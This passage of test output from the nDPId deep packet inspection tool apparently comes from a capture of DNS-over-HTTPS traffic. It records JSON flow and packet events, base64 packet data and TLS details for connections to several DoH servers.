04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"thread_ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rczn9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN35ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrDVkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="}
00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02429{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQfRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9DqojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELuv+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"}
00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+2DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="}
01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02376{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/dFIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcFRa4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeACLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNIyBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"}
